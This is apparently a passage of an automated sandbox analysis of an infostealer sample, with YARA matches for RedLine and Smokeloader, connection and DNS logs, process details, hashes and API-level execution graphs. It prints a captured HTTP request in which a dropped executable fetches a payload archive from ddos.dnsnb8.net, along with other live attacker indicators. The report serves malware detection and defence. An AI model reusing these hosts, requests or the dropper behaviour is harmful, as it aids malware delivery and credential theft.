                                                  Jul 26, 2024 01:14:16.549190998 CEST4970934450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:14:21.588965893 CEST4972234450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:14:21.596700907 CEST3445049722193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:14:21.596801996 CEST4972234450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:14:21.597059011 CEST4972234450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:14:21.611404896 CEST3445049722193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:14:42.990850925 CEST3445049722193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:14:42.990921974 CEST4972234450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:14:42.991172075 CEST4972234450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:14:48.000631094 CEST4972434450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:14:48.006125927 CEST3445049724193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:14:48.006328106 CEST4972434450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:14:48.006509066 CEST4972434450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:14:48.012383938 CEST3445049724193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:15:09.417165041 CEST3445049724193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:15:09.417345047 CEST4972434450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:15:09.417625904 CEST4972434450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:15:14.422514915 CEST4972634450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:15:14.862886906 CEST3445049726193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:15:14.863101006 CEST4972634450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:15:14.863714933 CEST4972634450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:15:14.868659973 CEST3445049726193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:15:36.236424923 CEST3445049726193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:15:36.236543894 CEST4972634450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:15:36.236756086 CEST4972634450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:15:41.250948906 CEST4972734450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:15:41.255980015 CEST3445049727193.106.191.123192.168.2.5
                                                  Jul 26, 2024 01:15:41.256155014 CEST4972734450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:15:41.256494999 CEST4972734450192.168.2.5193.106.191.123
                                                  Jul 26, 2024 01:15:41.261409044 CEST3445049727193.106.191.123192.168.2.5
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 26, 2024 01:13:46.099545002 CEST6468553192.168.2.51.1.1.1
                                                  Jul 26, 2024 01:13:46.343656063 CEST53646851.1.1.1192.168.2.5
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jul 26, 2024 01:13:46.099545002 CEST192.168.2.51.1.1.10xef22Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jul 26, 2024 01:13:46.343656063 CEST1.1.1.1192.168.2.50xef22No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                                  • ddos.dnsnb8.net:799
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.54970444.221.84.1057992920C:\Users\user\AppData\Local\Temp\IoUNtL.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 26, 2024 01:13:46.360872030 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                  Host: ddos.dnsnb8.net:799
                                                  Connection: Keep-Alive


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:19:13:44
                                                  Start date:25/07/2024
                                                  Path:C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe"
                                                  Imagebase:0x400000
                                                  File size:382'464 bytes
                                                  MD5 hash:C2BBBC6BB9408F1811A956AE26572F62
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000003.2035728193.0000000002110000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3273309685.000000000068E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:1
                                                  Start time:19:13:44
                                                  Start date:25/07/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\IoUNtL.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\IoUNtL.exe
                                                  Imagebase:0xf40000
                                                  File size:15'872 bytes
                                                  MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:19:13:49
                                                  Start date:25/07/2024
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1556
                                                  Imagebase:0xe60000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:10.2%
                                                    Dynamic/Decrypted Code Coverage:51.7%
                                                    Signature Coverage:27.3%
                                                    Total number of Nodes:209
                                                    Total number of Limit Nodes:24
                                                    execution_graph 76802 485000 76804 485044 GetPEB 76802->76804 76808 485077 CreateFileA 76804->76808 76806 48522d 76809 485246 WriteFile 76806->76809 76810 485244 76806->76810 76807 485265 76808->76806 76808->76807 76811 485255 FindCloseChangeNotification WinExec 76809->76811 76810->76811 76811->76807 76812 21da610 76814 21da623 76812->76814 76816 21da6c0 76814->76816 76817 21da708 VirtualProtect 76816->76817 76819 21da6a5 76817->76819 76820 21da890 76821 21da8d0 FindCloseChangeNotification 76820->76821 76823 21da901 76821->76823 76824 61003c 76825 610049 76824->76825 76839 610df8 SetErrorMode SetErrorMode 76825->76839 76829 610238 VirtualAlloc 76830 610265 76829->76830 76831 6102ce VirtualProtect 76830->76831 76832 61030b 76831->76832 76833 610439 VirtualFree 76832->76833 76837 6105f4 LoadLibraryA 76833->76837 76838 6104be 76833->76838 76834 6104e3 LoadLibraryA 76834->76838 76836 6108c7 76837->76836 76838->76834 76838->76837 76840 610223 76839->76840 76841 610d90 76840->76841 76842 610dad 76841->76842 76843 610db6 76842->76843 76844 610dbb GetPEB 76842->76844 76843->76829 76845 610ddc 76844->76845 76845->76829 76846 40cbdd 76848 40cbe9 __fcloseall 76846->76848 76890 40d534 HeapCreate 76848->76890 76850 40cc46 76951 41087e 71 API calls 8 library calls 76850->76951 76853 40cc4c 76854 40cc50 76853->76854 76855 40cc58 __RTC_Initialize 76853->76855 76952 40cbb4 62 API calls 3 library calls 76854->76952 76892 411a15 67 API calls 3 library calls 76855->76892 76857 40cc57 76857->76855 76859 40cc66 76860 40cc72 GetCommandLineA 76859->76860 76861 40cc6a 76859->76861 76893 412892 71 API calls 3 library calls 76860->76893 76953 40e79a 62 API calls 3 library calls 76861->76953 76864 40cc71 76864->76860 76865 40cc82 76954 4127d7 107 API calls 3 library calls 76865->76954 76867 40cc8c 76868 40cc90 76867->76868 76869 40cc98 76867->76869 76955 40e79a 62 API calls 3 library calls 76868->76955 76894 41255f 106 API calls 6 library calls 76869->76894 76872 40cc9d 76874 40cca1 76872->76874 76875 40cca9 76872->76875 76873 40cc97 76873->76869 76956 40e79a 62 API calls 3 library calls 76874->76956 76895 40e859 73 API calls 5 library calls 76875->76895 76878 40cca8 76878->76875 76879 40ccb0 76880 40ccb5 76879->76880 76881 40ccbc 76879->76881 76957 40e79a 62 API calls 3 library calls 76880->76957 76896 4019f0 OleInitialize 76881->76896 76884 40ccbb 76884->76881 76885 40ccd8 76886 40ccea 76885->76886 76958 40ea0a 62 API calls _doexit 76885->76958 76959 40ea36 62 API calls _doexit 76886->76959 76889 40ccef __fcloseall 76891 40cc3a 76890->76891 76891->76850 76950 40cbb4 62 API calls 3 library calls 76891->76950 76892->76859 76893->76865 76894->76872 76895->76879 76897 401ab9 76896->76897 76960 40b99e 76897->76960 76899 401abf 76900 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 76899->76900 76930 402467 76899->76930 76901 401dc3 FindCloseChangeNotification GetModuleHandleA 76900->76901 76909 401c55 76900->76909 76973 401650 76901->76973 76903 401e8b FindResourceA LoadResource LockResource SizeofResource 76975 40b84d 76903->76975 76907 401c9c CloseHandle 76907->76885 76908 401ecb _memset 76910 401efc SizeofResource 76908->76910 76909->76907 76913 401cf9 Module32Next 76909->76913 76911 401f1c 76910->76911 76912 401f5f 76910->76912 76911->76912 77031 401560 __VEC_memcpy __shift 76911->77031 76914 401f92 _memset 76912->76914 77032 401560 __VEC_memcpy __shift 76912->77032 76913->76901 76924 401d0f 76913->76924 76917 401fa2 FreeResource 76914->76917 76918 40b84d _malloc 62 API calls 76917->76918 76919 401fbb SizeofResource 76918->76919 76920 401fe5 _memset 76919->76920 76921 4020aa LoadLibraryA 76920->76921 76922 401650 76921->76922 76923 40216c GetProcAddress 76922->76923 76926 4021aa 76923->76926 76923->76930 76924->76907 76925 401dad Module32Next 76924->76925 76925->76901 76925->76924 76926->76930 77005 4018f0 76926->77005 76928 40243f 76928->76930 77033 40b6b5 62 API calls 2 library calls 76928->77033 76930->76885 76931 4021f1 76931->76928 77017 401870 76931->77017 76933 402269 VariantInit 76934 401870 75 API calls 76933->76934 76935 40228b VariantInit 76934->76935 76936 4022a7 76935->76936 76937 4022d9 SafeArrayCreate SafeArrayAccessData 76936->76937 77022 40b350 76937->77022 76940 40232c 76941 402354 SafeArrayDestroy 76940->76941 76949 40235b 76940->76949 76941->76949 76942 402392 SafeArrayCreateVector 76943 4023a4 76942->76943 76944 4023bc VariantClear VariantClear 76943->76944 77024 4019a0 76944->77024 76947 40242e 76948 4019a0 65 API calls 76947->76948 76948->76928 76949->76942 76950->76850 76951->76853 76952->76857 76953->76864 76954->76867 76955->76873 76956->76878 76957->76884 76958->76886 76959->76889 76963 40b9aa __fcloseall _strnlen 76960->76963 76961 40b9b8 77034 40bfc1 62 API calls __getptd_noexit 76961->77034 76963->76961 76965 40b9ec 76963->76965 76964 40b9bd 77035 40e744 6 API calls 2 library calls 76964->77035 77036 40d6e0 62 API calls 2 library calls 76965->77036 76968 40b9f3 77037 40b917 120 API calls 3 library calls 76968->77037 76970 40b9ff 77038 40ba18 LeaveCriticalSection _doexit 76970->77038 76971 40b9cd __fcloseall 76971->76899 76974 4017cc ___crtGetEnvironmentStringsA 76973->76974 76974->76903 76976 40b900 76975->76976 76987 40b85f 76975->76987 77046 40d2e3 6 API calls __decode_pointer 76976->77046 76978 40b906 77047 40bfc1 62 API calls __getptd_noexit 76978->77047 76981 401ebf 76993 40af66 76981->76993 76984 40b8bc RtlAllocateHeap 76984->76987 76985 40b870 76985->76987 77039 40ec4d 62 API calls 2 library calls 76985->77039 77040 40eaa2 62 API calls 7 library calls 76985->77040 77041 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 76985->77041 76987->76981 76987->76984 76987->76985 76988 40b8ec 76987->76988 76991 40b8f1 76987->76991 77042 40b7fe 62 API calls 4 library calls 76987->77042 77043 40d2e3 6 API calls __decode_pointer 76987->77043 77044 40bfc1 62 API calls __getptd_noexit 76988->77044 77045 40bfc1 62 API calls __getptd_noexit 76991->77045 76995 40af70 76993->76995 76994 40b84d _malloc 62 API calls 76994->76995 76995->76994 76996 40af8a 76995->76996 77000 40af8c std::bad_alloc::bad_alloc 76995->77000 77048 40d2e3 6 API calls __decode_pointer 76995->77048 76996->76908 76998 40afb2 77050 40af49 62 API calls std::exception::exception 76998->77050 77000->76998 77049 40d2bd 73 API calls __cinit 77000->77049 77001 40afbc 77051 40cd39 RaiseException 77001->77051 77004 40afca 77006 401903 lstrlenA 77005->77006 77007 4018fc 77005->77007 77052 4017e0 77006->77052 77007->76931 77010 401940 GetLastError 77012 40194b MultiByteToWideChar 77010->77012 77014 40198d 77010->77014 77011 401996 77011->76931 77013 4017e0 72 API calls 77012->77013 77015 401970 MultiByteToWideChar 77013->77015 77014->77011 77060 401030 GetLastError 77014->77060 77015->77014 77018 40af66 74 API calls 77017->77018 77019 40187c 77018->77019 77020 401885 SysAllocString 77019->77020 77021 4018a4 77019->77021 77020->77021 77021->76933 77023 40231a SafeArrayUnaccessData 77022->77023 77023->76940 77025 4019aa InterlockedDecrement 77024->77025 77030 4019df VariantClear 77024->77030 77026 4019b8 77025->77026 77025->77030 77027 4019c2 SysFreeString 77026->77027 77029 4019c9 77026->77029 77026->77030 77027->77029 77064 40aec0 63 API calls 2 library calls 77029->77064 77030->76947 77031->76911 77032->76914 77033->76930 77034->76964 77036->76968 77037->76970 77038->76971 77039->76985 77040->76985 77042->76987 77043->76987 77044->76991 77045->76981 77046->76978 77047->76981 77048->76995 77049->76998 77050->77001 77051->77004 77053 4017e9 77052->77053 77057 401844 77053->77057 77058 40182d 77053->77058 77061 40b783 72 API calls 4 library calls 77053->77061 77059 40186d MultiByteToWideChar 77057->77059 77063 40b743 62 API calls 2 library calls 77057->77063 77058->77057 77062 40b6b5 62 API calls 2 library calls 77058->77062 77059->77010 77059->77011 77061->77058 77062->77057 77063->77057 77064->77030 77065 68ef06 77066 68ef15 77065->77066 77069 68f6a6 77066->77069 77071 68f6c1 77069->77071 77070 68f6ca CreateToolhelp32Snapshot 77070->77071 77072 68f6e6 Module32First 77070->77072 77071->77070 77071->77072 77073 68ef1e 77072->77073 77074 68f6f5 77072->77074 77076 68f365 77074->77076 77077 68f390 77076->77077 77078 68f3d9 77077->77078 77079 68f3a1 VirtualAlloc 77077->77079 77078->77078 77079->77078

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 34 401cd0-401cd4 24->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 35 401cf0-401cf2 34->35 36 401cd6-401cd8 34->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->34 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 78 401da0-401da2 76->78 79 401d86-401d88 76->79 84 401da5-401da7 78->84 82 401d8a-401d90 79->82 83 401d9c-401d9e 79->83 82->78 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->83 87->7 87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 215d006 122->154 155 40234e call 215d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 215d006 135->152 153 402390 call 215d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 004019FD
                                                    • _getenv.LIBCMT ref: 00401ABA
                                                    • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                    • Module32First.KERNEL32 ref: 00401C48
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                    • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                    • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                    • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                    • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                    • _malloc.LIBCMT ref: 00401EBA
                                                    • _memset.LIBCMT ref: 00401EDD
                                                    • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                    • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                    • API String ID: 2366190142-2962942730
                                                    • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                    • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                    • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                    • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 156 485044-485074 GetPEB 157 485077-48509a 156->157 158 48509d-4850a0 157->158 159 4851ee-48522b CreateFileA 158->159 160 4850a6-4850bc 158->160 177 48522d-485230 159->177 178 485265-485269 159->178 161 4850be-4850c5 160->161 162 485110-485116 160->162 161->162 163 4850c7-4850ce 161->163 165 485118-48511f 162->165 166 485129-48512f 162->166 163->162 170 4850d0-4850d7 163->170 165->166 167 485121-485124 165->167 168 485148-48514e 166->168 169 485131-485138 166->169 172 4851bb-4851c0 167->172 174 485150-485157 168->174 175 485167-48516f 168->175 169->168 173 48513a-485141 169->173 170->162 176 4850d9-4850dd 170->176 180 4851e0-4851e9 172->180 181 4851c2-4851c5 172->181 173->168 179 485143-485146 173->179 174->175 182 485159-485160 174->182 183 485188-48518e 175->183 184 485171-485178 175->184 176->162 185 4850df-4850e3 176->185 186 485232-485238 177->186 179->172 180->158 181->180 187 4851c7-4851ca 181->187 182->175 188 485162-485165 182->188 191 485190-485197 183->191 192 4851a7-4851ad 183->192 184->183 189 48517a-485181 184->189 185->172 190 4850e9-48510b 185->190 194 48523a-485242 186->194 195 485246-485252 WriteFile 186->195 187->180 196 4851cc-4851cf 187->196 188->172 189->183 197 485183-485186 189->197 190->157 191->192 198 485199-4851a0 191->198 192->172 193 4851af-4851b6 192->193 193->172 200 4851b8 193->200 194->186 201 485244 194->201 202 485255-485262 FindCloseChangeNotification WinExec 195->202 196->180 203 4851d1-4851d4 196->203 197->172 198->192 199 4851a2-4851a5 198->199 199->172 200->172 201->202 202->178 203->180 205 4851d6-4851d9 203->205 205->180 206 4851db-4851de 205->206 206->159 206->180
                                                    APIs
                                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00485223
                                                    • WriteFile.KERNELBASE(00000000,FFF856AF,00003E00,?,00000000), ref: 00485252
                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00485256
                                                    • WinExec.KERNEL32(?,00000005), ref: 00485262
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272434016.0000000000485000.00000040.00000001.01000000.00000003.sdmp, Offset: 00485000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_485000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                                    • String ID: .dll$Clos$Crea$GetM$GetT$IoUNtL.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                                                    • API String ID: 2234911746-2974676282
                                                    • Opcode ID: 604a12e5a804219d6de64c6b643bc59f12ee77f96f1fc524d2f4394f4cbc7fe3
                                                    • Instruction ID: abfa3f6cbedf568ed3987089ad2ae04d3e6fbcf7bbfcd144e97aba101cdc9d4f
                                                    • Opcode Fuzzy Hash: 604a12e5a804219d6de64c6b643bc59f12ee77f96f1fc524d2f4394f4cbc7fe3
                                                    • Instruction Fuzzy Hash: 7D612774D01615DBCF24DF94C888BAEB7B0BF44715F648AABD405AB701C7389E81CB9A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 449 60d90c8-60d90da 450 60d90dc-60d90ed 449->450 451 60d90f5-60d90f7 449->451 450->451 452 60d90fd-60d9100 451->452 453 60d917c-60d9181 451->453 452->453 454 60d9102-60d911e 452->454 458 60d9184-60d918e 454->458 459 60d9120-60d9124 454->459 462 60d9198-60d9232 458->462 463 60d9190-60d9195 call 60d2378 458->463 460 60d9145-60d9149 459->460 461 60d9126-60d913d call 60d55c8 459->461 460->453 464 60d914b-60d915b 460->464 641 60d913f call 60d90c8 461->641 642 60d913f call 60d90b7 461->642 484 60d923a-60d9270 462->484 485 60d9234-60d9239 462->485 463->462 471 60d915d-60d9167 464->471 472 60d916f-60d9174 464->472 471->472 472->453 489 60d92aa-60d92b4 484->489 490 60d9272-60d9276 484->490 491 60d92be-60d92da 489->491 492 60d92b6-60d92bb call 60d2378 489->492 493 60d9278-60d927e 490->493 494 60d92e1-60d92eb 490->494 491->494 492->491 495 60d9286-60d9299 493->495 496 60d9280-60d9285 493->496 497 60d92ed-60d92f2 call 60d2378 494->497 498 60d92f5-60d937c 494->498 506 60d929b-60d92a0 495->506 507 60d92a1-60d92a9 495->507 497->498 516 60d939c-60d93a5 498->516 517 60d937e-60d9384 498->517 520 60d93ae-60d9420 516->520 521 60d93a7-60d93ac call 60d2378 516->521 518 60d9397-60d939b 517->518 519 60d9386-60d9389 517->519 524 60d9391-60d9395 519->524 530 60d964d-60d9656 520->530 531 60d9426-60d942f 520->531 521->520 524->518 524->519 532 60d965f-60d967a 530->532 533 60d9658-60d965d call 60d2378 530->533 534 60d9435-60d9439 531->534 535 60d9681-60d968a 531->535 532->535 533->532 537 60d943f-60d9445 534->537 538 60d9729-60d9732 534->538 539 60d968c-60d9691 call 60d2378 535->539 540 60d9693-60d9722 535->540 537->538 546 60d944b-60d9457 537->546 544 60d973b-60d97ec 538->544 545 60d9734-60d9739 call 60d2378 538->545 539->540 540->538 551 60d97f3-60d982a 544->551 545->544 550 60d945d-60d946f 546->550 546->551 558 60d9475 550->558 559 60d9471-60d9473 550->559 561 60d982c-60d9834 551->561 562 60d9835-60d988d 551->562 563 60d947a-60d9480 558->563 559->563 615 60d98dd-60d98fa 562->615 616 60d988f-60d98d4 562->616 565 60d9488-60d948b 563->565 566 60d9482-60d9486 563->566 569 60d9491-60d9499 565->569 566->565 566->569 572 60d949f 569->572 573 60d95c8-60d95d1 569->573 575 60d9504-60d9517 572->575 576 60d94a6-60d9501 call 60d6190 572->576 577 60d9566-60d9579 572->577 579 60d95da-60d9646 573->579 580 60d95d3-60d95d8 call 60d2378 573->580 586 60d952f-60d9563 call 60d6190 575->586 587 60d9519-60d951f 575->587 583 60d957b-60d9581 577->583 584 60d9591-60d95c5 call 60d6190 577->584 579->530 580->579 591 60d9585-60d958f 583->591 592 60d9583 583->592 595 60d9521 587->595 596 60d9523-60d952d 587->596 591->584 592->584 595->586 596->586 629 60d98fc-60d9902 615->629 630 60d9904 615->630 616->615 632 60d9906-60d9908 629->632 630->632 636 60d990a-60d9911 632->636 637 60d9913 632->637 636->637 640 60d991b-60d9922 636->640 637->640 641->460 642->460
                                                    Strings
                                                    Memory Dump Source
